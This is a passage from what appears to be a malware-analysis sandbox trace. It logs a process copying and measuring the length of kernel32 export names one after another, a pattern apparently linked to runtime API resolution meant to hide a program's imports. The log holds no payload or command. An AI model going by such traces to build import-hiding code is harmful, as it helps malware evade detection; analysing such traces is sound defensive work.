returned="AddSIDToBoundaryDescriptor" [0082.615] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.616] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.616] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.616] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.616] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.616] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.616] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.616] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.616] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.616] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.616] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.616] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.616] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.616] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.616] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.616] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.616] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.616] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.616] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.617] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.617] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.617] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.617] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.617] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.617] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.617] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.617] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.617] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.617] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.617] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.617] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.617] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.617] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.617] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.617] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.617] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.617] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.617] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.618] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.618] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.618] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.618] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.618] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.618] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.618] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.618] lstrlenA (lpString="BEEP") returned 4 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.618] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.618] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.618] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.618] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.618] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.618] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.618] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.618] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.618] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.618] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.619] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.619] lstrlenA (lpString="CANCELIO") returned 8 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.619] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.619] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.619] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.619] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.619] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.619] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.619] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.619] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.619] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.619] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.619] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.619] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.619] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.619] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.619] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.619] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.620] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.620] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.620] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.620] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.620] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.620] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.620] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.620] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.620] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.620] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.620] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.620] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.620] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.620] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.620] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.620] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.620] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.620] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.621] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.621] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.621] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.621] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.621] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.621] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.621] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.621] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.621] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.621] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.621] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.621] lstrlenA (lpString="COPYFILEA") returned 9 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.621] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.621] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.621] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.621] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.621] lstrlenA (lpString="COPYFILEW") returned 9 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.621] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.622] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.622] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.622] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.622] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.622] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.622] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.622] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.622] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.622] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.622] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.622] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.622] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.622] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.622] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.622] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.622] lstrcpyA 